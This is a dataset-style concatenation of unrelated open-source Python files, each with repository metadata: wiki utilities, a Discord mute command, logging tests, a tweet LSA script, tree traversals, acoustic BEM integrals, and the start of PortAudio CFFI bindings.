self.logger.write('msg', 'DEBUG')
self._verify_message('20060613 08:37:42.123 | DEBUG | msg\n')
def _verify_message(self, expected):
assert_equals(self.logger._writer.getvalue(), expected)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 1,760,009,257,251,679,000 | 31.189655 | 80 | 0.636315 | false |
loleg/realms-wiki | realms/lib/util.py | 1 | 3701 | import click
import re
import os
import hashlib
import json
import string
import random
import sys
from jinja2 import Template
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def random_string(size=6, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def to_json(data):
return json.dumps(to_dict(data), separators=(',', ':'))
def to_dict(data):
if not data:
return AttrDict()
def row2dict(row):
d = AttrDict()
for column in row.__table__.columns:
d[column.name] = getattr(row, column.name)
return d
if isinstance(data, list):
return [row2dict(x) for x in data]
else:
return row2dict(data)
def mkdir_safe(path):
if path and not(os.path.exists(path)):
os.makedirs(path)
return path
def extract_path(file_path):
if not file_path:
return None
last_slash = file_path.rindex("/")
if last_slash:
return file_path[0, last_slash]
def clean_path(path):
if path:
if path[0] != '/':
path.insert(0, '/')
return re.sub(r"//+", '/', path)
def extract_name(file_path):
if file_path[-1] == "/":
return None
return os.path.basename(file_path)
def remove_ext(path):
return os.path.splitext(path)[0]
def clean_url(url):
if not url:
return url
url = url.replace('%2F', '/')
url = re.sub(r"^/+", "", url)
return re.sub(r"//+", '/', url)
def to_canonical(s):
"""
Double space -> single dash
Double dash -> single dash
Remove .md file extension
Remove all non alphanumeric and dash
Limit to first 64 chars
"""
s = s.encode('ascii', 'ignore')
s = str(s)
s = re.sub(r"\s\s*", "-", s)
s = re.sub(r"\-\-+", "-", s)
s = re.sub(r"\.md$", "", s)
s = re.sub(r"[^a-zA-Z0-9\-]", "", s)
s = s[:64]
return s
def cname_to_filename(cname):
""" Convert canonical name to filename
:param cname: Canonical name
:return: str -- Filename
"""
return cname + ".md"
def filename_to_cname(filename):
"""Convert filename to canonical name.
.. note::
It's assumed filename is already canonical format
"""
return os.path.splitext(filename)[0]
def gravatar_url(email):
return "https://www.gravatar.com/avatar/" + hashlib.md5(email).hexdigest()
def in_virtualenv():
return hasattr(sys, 'real_prefix')
def in_vagrant():
return os.path.isdir("/vagrant")
def is_su():
return os.geteuid() == 0
def green(s):
click.secho(s, fg='green')
def yellow(s):
click.secho(s, fg='yellow')
def red(s):
click.secho(s, fg='red')
def upstart_script(user='root', app_dir=None, port=5000, workers=2, path=None):
script = """
limit nofile 65335 65335
respawn
description "Realms Wiki"
author "[email protected]"
chdir {{ app_dir }}
{% if path %}
env PATH={{ path }}:/usr/local/bin:/usr/bin:/bin:$PATH
export PATH
{% endif %}
env LC_ALL=en_US.UTF-8
env GEVENT_RESOLVER=ares
export LC_ALL
export GEVENT_RESOLVER
setuid {{ user }}
setgid {{ user }}
start on runlevel [2345]
stop on runlevel [!2345]
respawn
exec gunicorn \
--name realms-wiki \
--access-logfile - \
--error-logfile - \
--worker-class gevent \
--workers {{ workers }} \
--bind 0.0.0.0:{{ port }} \
--user {{ user }} \
--group {{ user }} \
--chdir {{ app_dir }} \
'realms:create_app()'
"""
template = Template(script)
return template.render(user=user, app_dir=app_dir, port=port, workers=workers, path=path)
| gpl-2.0 | -2,907,286,904,536,917,000 | 17.979487 | 97 | 0.597406 | false |
zekroTJA/regiusBot | commands/cmd_mute.py | 1 | 2707 | import discord
from os import path, makedirs, remove
import STATICS
ROLE_NAME = "Supporter"
perm = 2
description = "Mute members on guild in chat"
def get_mutes(server):
if not path.isdir("SAVES/" + server.id):
makedirs("SAVES/" + server.id)
if path.isfile("SAVES/" + server.id + "/mutes"):
with open("SAVES/" + server.id + "/mutes") as f:
return [line.replace("\n", "") for line in f.readlines()]
else:
return []
def add_mute(member, server):
mutelist = get_mutes(server)
mutelist.append(member.id)
try:
remove("SAVES/" + server.id + "/mutes")
except:
pass
with open("SAVES/" + server.id + "/mutes", "w") as fw:
[(lambda x: fw.write(x + "\n"))(line) for line in mutelist]
def rem_mute(member, server):
mutelist = get_mutes(server)
mutelist.remove(member.id)
try:
remove("SAVES/" + server.id + "/mutes")
except:
pass
with open("SAVES/" + server.id + "/mutes", "w") as fw:
[(lambda x: fw.write(x))(line) for line in mutelist]
def get_member(id, server):
return discord.utils.get(server.members, id=id)
async def check_mute(message, client):
if not message.channel.is_private:
if get_mutes(message.server).__contains__(message.author.id):
await client.send_message(message.author, embed=discord.Embed(color=discord.Color.red(), description="Sorry, but you got muted on this server! Contact a supporter to get unmuted."))
await client.delete_message(message)
async def ex(message, client):
if message.content.replace(STATICS.PREFIX + "mute ", "") == "list":
muted_str = "\n".join([get_member(line, message.server).name for line in get_mutes(message.server)]) if len(get_mutes(message.server)) > 0 else "no one"
await client.send_message(message.channel, embed=discord.Embed(description="**MUTED MEMBERS\n\n**" + muted_str))
elif len(message.mentions) < 1:
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description="Please mention the user you want to mute!"))
elif get_mutes(message.server).__contains__(message.mentions[0].id):
rem_mute(message.mentions[0], message.server)
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.green(), description=("%s got unmuted by %s." % (message.mentions[0].mention, message.author.mention))))
else:
add_mute(message.mentions[0], message.server)
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.orange(), description=("%s got muted by %s." % (message.mentions[0].mention, message.author.mention))))
| mit | 6,176,478,198,408,302,000 | 39.402985 | 195 | 0.655707 | false |
Dinoshauer/linie | tests/test_handlers.py | 1 | 2635 | """Linie handlers test specs."""
import logging
from testfixtures import LogCapture
from unittest import TestCase
from linie import handlers, exceptions
from linie.handlers import DEFAULT_FORMAT, _check_keys, _check_values, _get_fmts
class TestStreamHandlerPrivates(TestCase):
"""Test private functions of the stream handler."""
def setUp(self):
"""Set up mocks."""
self.mock_fmts = {
'date': '%Y-%m-%d %H:%M:%S',
'log': '%(asctime)s [%(levelname)s] %(message)s',
}
def test__check_keys(self):
"""Assert that the function can compare two lists."""
result = _check_keys(self.mock_fmts.keys(), self.mock_fmts.keys())
assert result is True
with self.assertRaises(exceptions.InvalidListError):
_check_keys(['foo'], ['bar'])
def test__check_values(self):
"""The function can check that a list of values is a specific type."""
result = _check_values(self.mock_fmts.values(), str)
assert result is True
with self.assertRaises(exceptions.InvalidValueType):
_check_values([1], str)
def test__get_fmts(self):
"""The function should return a tuple of ``str``s."""
result = _get_fmts(self.mock_fmts, DEFAULT_FORMAT)
assert type(result) is tuple
assert type(result[0]) is str
assert type(result[1]) is str
assert result[0] == self.mock_fmts['log']
assert result[1] == self.mock_fmts['date']
class TestStreamHandler(TestCase):
"""Test the functionality of the stream handler itself."""
@staticmethod
def _generate_check(levels, msg, name):
"""Generate the list of tuples that is needed to check logged items."""
result = []
for level in levels:
result.append((name, level.upper(), msg))
return result
def setUp(self):
"""Set up mocks."""
self.log_name = 'test-logger'
self.msg = 'Hello, world!'
self.levels = ['info', 'debug', 'warning', 'error', 'critical']
self.check_logs = self._generate_check(self.levels, self.msg,
self.log_name)
def test_stream_handler(self):
"""Assert the stream handlers functionality."""
with LogCapture() as l:
logger = logging.getLogger(self.log_name)
logger.addHandler(handlers.stream())
for level in self.levels:
getattr(logger, level)(self.msg)
# l.check will raise an AssertionError if its
# internal checks goes wrong.
l.check(*self.check_logs)
| mit | 7,705,936,456,296,599,000 | 34.133333 | 80 | 0.599241 | false |
totalgood/nlpia | src/nlpia/scripts/lsa_tweets.py | 1 | 3415 | import os
import gc
import json
import numpy as np
import gzip
from gensim.models import TfidfModel, LsiModel
from gensim.corpora import Dictionary
from nlpia.data.loaders import BIGDATA_PATH, read_csv
KEEP_N = 300000 # max vocab size
NO_BELOW = 5 # min DF (count)
NO_ABOVE = .7 # max DF (fraction)
def lsa_twitter(cased_tokens):
""" Latent Sentiment Analyis on random sampling of twitter search results for words listed in cased_tokens """
# Only 5 of these tokens are saved for a no_below=2 filter:
# PyCons NLPS #PyCon2016 #NaturalLanguageProcessing #naturallanguageprocessing
if cased_tokens is None:
cased_tokens = ('PyConOpenSpaces PyCon PyCon2017 PyCon2018 PyCon2016 PyCon2015 OpenSpace PyconTutorial ' +
'NLP NaturalLanguageProcessing NLPInAction NaturalLanguageProcessingInAction NLPIA Twote Twip'
).split()
cased_tokens += [s + 's' for s in cased_tokens]
cased_tokens += 'TotalGood TotalGoods HobsonLane Hob Hobs TotalGood.com ' \
'www.TotalGood.com http://www.TotalGood.com https://www.TotalGood.com'.split()
allcase_tokens = cased_tokens + [s.lower() for s in cased_tokens]
allcase_tokens += [s.title() for s in cased_tokens]
allcase_tokens += [s.upper() for s in cased_tokens]
KEEP_TOKENS = allcase_tokens + ['#' + s for s in allcase_tokens]
# takes 15 minutes and 10GB of RAM for 500k tweets if you keep all 20M unique tokens/names URLs
vocab_path = os.path.join(BIGDATA_PATH, 'vocab939370.pkl')
if os.path.isfile(vocab_path):
print('Loading vocab: {} ...'.format(vocab_path))
vocab = Dictionary.load(vocab_path)
print(' len(vocab) loaded: {}'.format(len(vocab.dfs)))
else:
tweets_path = os.path.join(BIGDATA_PATH, 'tweets.csv.gz')
print('Loading tweets: {} ...'.format(tweets_path))
tweets = read_csv(tweets_path)
tweets = np.array(tweets.text.str.split())
with gzip.open(os.path.join(BIGDATA_PATH, 'tweets.txt.gz'), 'w') as f:
for tokens in tweets:
f.write((' '.join(tokens) + '\n').encode('utf-8'))
# tweets['text'] = tweets.text.apply(lambda s: eval(s).decode('utf-8'))
# tweets['user'] = tweets.user.apply(lambda s: eval(s).decode('utf-8'))
# tweets.to_csv('tweets.csv.gz', compression='gzip')
print('Computing vocab from {} tweets...'.format(len(tweets)))
vocab = Dictionary(tweets, no_below=NO_BELOW, no_above=NO_ABOVE, keep_tokens=set(KEEP_TOKENS))
vocab.filter_extremes(no_below=NO_BELOW, no_above=NO_ABOVE, keep_n=KEEP_N, keep_tokens=set(KEEP_TOKENS))
print(' len(vocab) after filtering: {}'.format(len(vocab.dfs)))
# no time at all, just a bookeeping step, doesn't actually compute anything
tfidf = TfidfModel(id2word=vocab, dictionary=vocab)
tfidf.save(os.path.join(BIGDATA_PATH, 'tfidf{}.pkl'.format(len(vocab.dfs))))
tweets = [vocab.doc2bow(tw) for tw in tweets]
json.dump(tweets, gzip.open(os.path.join(BIGDATA_PATH, 'tweet_bows.json.gz'), 'w'))
gc.collect()
# LSA is more useful name than LSA
lsa = LsiModel(tfidf[tweets], num_topics=200, id2word=vocab, extra_samples=100, power_iters=2)
return lsa
if __name__ == '__main__':
lsa = lsa_twitter()
# these models can be big
lsa.save(os.path.join(BIGDATA_PATH, 'lsa_tweets'))
| mit | -2,815,172,349,528,805,000 | 42.782051 | 118 | 0.656223 | false |
ResolveWang/algrithm_qa | binarytree/q1.py | 1 | 3054 | """
问题描述:分别用递归和非递归方式实现二叉树的先序、中序、和后续遍历
思路:使用非递归的方式需要使用辅助栈代替函数栈
"""
from binarytree.toolcls import Node
class RecursiveVisit:
@classmethod
def visit_in_first_order(cls, head):
if head is None:
return
print(head.value, end=' ')
cls.visit_in_first_order(head.left)
cls.visit_in_first_order(head.right)
@classmethod
def visit_in_mid_order(cls, head):
if head is None:
return
cls.visit_in_mid_order(head.left)
print(head.value, end=' ')
cls.visit_in_mid_order(head.right)
@classmethod
def visit_in_last_order(cls, head):
if head is None:
return
cls.visit_in_last_order(head.left)
cls.visit_in_last_order(head.right)
print(head.value, end=' ')
class LoopVisit:
@classmethod
def visit_in_first_order(cls, head):
if head is None:
return
stack = list()
stack.append(head)
while len(stack) > 0:
node = stack.pop()
print(node.value, end=' ')
if node.right is not None:
stack.append(node.right)
if node.left is not None:
stack.append(node.left)
@classmethod
def visit_in_mid_order(cls, head):
if head is None:
return
stack = list()
cur = head
while len(stack) > 0 or cur is not None:
if cur is not None:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
print(cur.value, end=' ')
cur = cur.right
@classmethod
def visit_in_last_order(cls, head):
if head is None:
return
stack1 = list()
stack2 = list()
cur = head
stack1.append(cur)
while len(stack1) > 0:
cur = stack1.pop()
if cur.left is not None:
stack1.append(cur.left)
if cur.right is not None:
stack1.append(cur.right)
stack2.append(cur.value)
while len(stack2) > 0:
print(stack2.pop(), end=' ')
if __name__ == '__main__':
head = Node(5)
head.left = Node(3)
head.right = Node(8)
head.left.left = Node(2)
head.left.right = Node(4)
head.left.left.left = Node(1)
head.right.left = Node(7)
head.right.left.left = Node(6)
head.right.right = Node(10)
head.right.right.left = Node(9)
head.right.right.right = Node(11)
RecursiveVisit.visit_in_first_order(head)
print()
LoopVisit.visit_in_first_order(head)
print()
print('===========================')
RecursiveVisit.visit_in_mid_order(head)
print()
LoopVisit.visit_in_mid_order(head)
print()
print('===========================')
RecursiveVisit.visit_in_last_order(head)
print()
LoopVisit.visit_in_last_order(head)
print() | mit | -6,681,515,285,919,521,000 | 24.153846 | 48 | 0.532631 | false |
Gjacquenot/AcousticBEM | Python/HelmholtzIntegralsRAD.py | 1 | 15968 | # ---------------------------------------------------------------------------
# Copyright (C) 2017 Frank Jargstorff
#
# This file is part of the AcousticBEM library.
# AcousticBEM is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# AcousticBEM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AcousticBEM. If not, see <http://www.gnu.org/licenses/>.
# ---------------------------------------------------------------------------
import numpy as np
from numpy.linalg import norm
from HelmholtzIntegrals2D import ComplexQuad
from Geometry import Normal2D
class CircularIntegratorPi(object):
"""
Integrator class for integrating the upper half-circle or in other
words integrate a function along the unit acr over angles
theta in [0, pi].
"""
samples = np.array([[0.980144928249, 5.061426814519E-02],
[0.898333238707, 0.111190517227],
[0.762766204958, 0.156853322939],
[0.591717321248, 0.181341891689],
[0.408282678752, 0.181341891689],
[0.237233795042, 0.156853322939],
[0.101666761293, 0.111190517227],
[1.985507175123E-02, 5.061426814519E-02]], dtype=np.float32)
def __init__(self, segments):
self.segments = segments
nSamples = segments * self.samples.shape[0]
self.rotationFactors = np.empty((nSamples, 2), dtype=np.float32)
factor = np.pi / self.segments
for i in range(nSamples):
arcAbscissa = i / self.samples.shape[0] + self.samples[i % self.samples.shape[0], 0]
arcAbscissa *= factor
self.rotationFactors[i, :] = np.cos(arcAbscissa), np.sin(arcAbscissa)
def integrate(self, func):
sum = 0.0
for n in range(self.rotationFactors.shape[0]):
sum += self.samples[n % self.samples.shape[0], 1] * func(self.rotationFactors[n, :])
return sum * np.pi / self.segments
def ComplexQuadGenerator(func, start, end):
"""
This is a variation on the basic complex quadrature function from the
base class. The difference is, that the abscissa values y**2 have been
substituted for x. Kirkup doesn't explain the details of why this
is helpful for the case of this kind of 2D integral evaluation, but points
to his PhD thesis and another reference that I have no access to.
"""
samples = np.array([[0.980144928249, 5.061426814519E-02],
[0.898333238707, 0.111190517227],
[0.762766204958, 0.156853322939],
[0.591717321248, 0.181341891689],
[0.408282678752, 0.181341891689],
[0.237233795042, 0.156853322939],
[0.101666761293, 0.111190517227],
[1.985507175123E-02, 5.061426814519E-02]], dtype=np.float32)
vec = end - start
sum = 0.0
for n in range(samples.shape[0]):
x = start + samples[n, 0]**2 * vec
sum += samples[n, 1] * func(x) * samples[n, 0]
return 2.0 * sum * norm(vec)
def ComplexQuadCone(func, start, end, segments = 1):
delta = 1.0 / segments * (end - start)
sum = 0.0
for s in range(segments):
sum += ComplexQuad(func, start + s * delta, start + (s+1) * delta)
return sum
def ComputeL(k, p, qa, qb, pOnElement):
qab = qb - qa
# subdived circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if pOnElement:
ap = p - qa
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(2 * nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
return 1.0 / norm(rr)
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuadGenerator(generatorFunc, p, qa) + ComplexQuadGenerator(generatorFunc, p, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(2 * nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return (np.exp(1.0j * k * RR) - 1.0) / RR
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComputeL(0.0, p, qa, qb, True) + ComplexQuad(generatorFunc, qa, qb)
else:
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
return 1.0 / norm(rr)
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return np.exp(1.0j * k * RR) / RR
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
return 0.0
def ComputeM(k, p, qa, qb, pOnElement):
qab = qb - qa
vec_q = Normal2D(qa, qb)
# subdived circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
return -np.dot(rr, vec_q3) / (norm(rr) * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return (1j * k * RR - 1.0) * np.exp(1j * k * RR) * np.dot(rr, vec_q3) / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
return 0.0
def ComputeMt(k, p, vecp, qa, qb, pOnElement):
qab = qb - qa
# subdived circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
dotRnP = vecp[0] * rr[0] + vec[1] * rr[2]
return dotRnP / (norm(rr) * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
return -(1j * k * RR - 1.0) * np.exp(1j * k * RR) * dotRnP / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
def ComputeN(k, p, vecp, qa, qb, pOnElement):
qab = qb - qa
vec_q = Normal2D(qa, qb)
# subdived circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if pOnElement:
if k == 0.0:
vecp3 = np.array([vecp[0], 0.0, vecp[1]], dtype=np.float32)
def coneFunc(x, direction):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.sqrt(0.5) * np.array([x[0], x[1], direction], dtype=np.float32)
dnpnq = np.dot(vecp3, vec_q3)
rr = q3 - p3
RR = norm(rr)
dotRNP = np.dot(rr, vecp3)
dotRNQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRNP * dotRNQ / np.dot(rr, rr)
return (dnpnq + 3.0 * RNPRNQ) / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
lenAB = norm(qab)
# deal with the cone at the qa side of the generator
direction = np.sign(qa[1] - qb[1])
if direction == 0.0:
direction = 1.0
tip_a = np.array([0.0, qa[1] + direction * qa[0]], dtype=np.float32)
nConeSectionsA = int(qa[0] * np.sqrt(2.0) / lenAB) + 1
coneValA = ComplexQuadCone(lambda x: coneFunc(x, direction), qa, tip_a, nConeSectionsA)
# deal with the cone at the qb side of the generator
direction = np.sign(qb[1] - qa[1])
if direction == 0.0:
direction = -1.0
tip_b = np.array([0.0, qb[1] + direction * qb[0]], dtype=np.float32)
nConeSectionsB = int(qb[0] * np.sqrt(2.0) / lenAB) + 1
coneValB = ComplexQuadCone(lambda x: coneFunc(x, direction), qb, tip_b, nConeSectionsB)
return -(coneValA + coneValB)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPG0 = 1.0 / RR
FPGR = np.exp(IKR) / np.dot(rr, rr) * (IKR - 1.0)
FPGR0 = -1.0 / np.dot(rr, rr)
FPGRR = np.exp(IKR) * (2.0 - 2.0 * IKR - (k*RR)**2) / (RR * np.dot(rr, rr))
FPGRR0 = 2.0 / (RR * np.dot(rr, rr))
return (FPGR - FPGR0) * RNPNQ + (FPGRR - FPGRR0) * RNPRNQ \
+ k**2 * FPG0 / 2.0
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComputeN(0.0, p, vecp, qa, qb, True) - k**2 * ComputeL(0.0, p, qa, qb, True) / 2.0 \
+ ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPGR = -1.0 / np.dot(rr, rr)
FPGRR = 2.0 / (RR * np.dot(rr, rr))
return FPGR * RNPNQ + FPGRR * RNPRNQ
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPGR = np.exp(IKR) / np.dot(rr, rr) * (IKR - 1.0)
FPGRR = np.exp(IKR) * (2.0 - 2.0 * IKR - (k*RR)**2) / (RR * np.dot(rr, rr))
return FPGR * RNPNQ + FPGRR * RNPRNQ
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
| gpl-3.0 | -5,642,675,042,839,800,000 | 38.92 | 110 | 0.48353 | false |
bastibe/PySoundCard | pysoundcard.py | 1 | 26373 | import sys
import os
from cffi import FFI
import atexit
import numpy as np
import warnings
"""PySoundCard is an audio library based on PortAudio, CFFI and NumPy
PySoundCard can play and record audio data. Audio devices are supported
through PortAudio[1], which is a free, cross-platform, open-source
audio I/O library that runs on may platforms including Windows, OS X,
and Unix (OSS/ALSA). It is accessed through CFFI[2], which is a
foreign function interface for Python calling C code. CFFI is
supported for CPython 2.6+, 3.x and PyPy 2.0+. PySoundCard represents
audio data as NumPy arrays.
PySoundCard is inspired by PyAudio[3]. Its main difference is that it
uses CFFI instead of a CPython extension and tries to implement a more
pythonic interface. Its performance characteristics are very similar.
[1]: http://www.portaudio.com/
[2]: http://cffi.readthedocs.org/
[3]: http://people.csail.mit.edu/hubert/pyaudio/
The basic building block of audio input/output in PySoundCard are
streams. Streams represent sound cards, both for audio playback and
recording. Every stream has a sample rate, a block size, an input
device and/or an output device.
There are two modes of operation for streams: read/write and callback
mode.
In read/write mode, two methods are used to play/record audio: For
playback, you write to a stream. For recording, you read from a
stream. You can read/write up to one block of audio data to a stream
without having to wait for it to play.
In callback mode, a callback function is defined, which will be called
asynchronously whenever there is a new block of audio data available
to read or write. The callback function must then provide/consume one
block of audio data.
A stream can be either full duplex (both input and output) or half
duplex (either input or output). This is determined by specifying one
or two devices for the stream. Both devices must be part of the same
audio API.
Use the function apis() to get a list of all available apis. Use the
function devices() to get a list of all available devices. There are
additional functions to get the default devices and api. If a stream
is created without specifying a device, the default devices are used.
Both devices and apis are simple dictionaries that contain information
and configuration options. Many device options can be changed simply
by modifying the dictionary before passing it to the stream
constructor. This includes the number of channels, the desired
latency, and the audio data format.
PySoundCard is BSD licensed.
(c) 2013, Bastian Bechtold
"""
__version__ = "0.5.2"
ffi = FFI()
ffi.cdef("""
typedef int PaError;
typedef enum PaErrorCode
{
paNoError = 0,
paNotInitialized = -10000,
paUnanticipatedHostError,
paInvalidChannelCount,
paInvalidSampleRate,
paInvalidDevice,
paInvalidFlag,
paSampleFormatNotSupported,
paBadIODeviceCombination,
paInsufficientMemory,
paBufferTooBig,
paBufferTooSmall,
paNullCallback,
paBadStreamPtr,
paTimedOut,
paInternalError,
paDeviceUnavailable,
paIncompatibleHostApiSpecificStreamInfo,
paStreamIsStopped,
paStreamIsNotStopped,
paInputOverflowed,
paOutputUnderflowed,
paHostApiNotFound,
paInvalidHostApi,
paCanNotReadFromACallbackStream,
paCanNotWriteToACallbackStream,
paCanNotReadFromAnOutputOnlyStream,
paCanNotWriteToAnInputOnlyStream,
paIncompatibleStreamHostApi,
paBadBufferPtr
} PaErrorCode;
PaError Pa_Initialize(void);
PaError Pa_Terminate(void);
int Pa_GetVersion(void);
const char *Pa_GetVersionText(void);
typedef int PaDeviceIndex;
typedef enum PaHostApiTypeId
{
paInDevelopment=0, /* use while developing support for a new host API */
paDirectSound=1,
paMME=2,
paASIO=3,
paSoundManager=4,
paCoreAudio=5,
paOSS=7,
paALSA=8,
paAL=9,
paBeOS=10,
paWDMKS=11,
paJACK=12,
paWASAPI=13,
paAudioScienceHPI=14
} PaHostApiTypeId;
typedef struct PaHostApiInfo {
int structVersion;
enum PaHostApiTypeId type;
const char *name;
int deviceCount;
PaDeviceIndex defaultInputDevice;
PaDeviceIndex defaultOutputDevice;
} PaHostApiInfo;
typedef int PaHostApiIndex;
PaHostApiIndex Pa_GetHostApiCount();
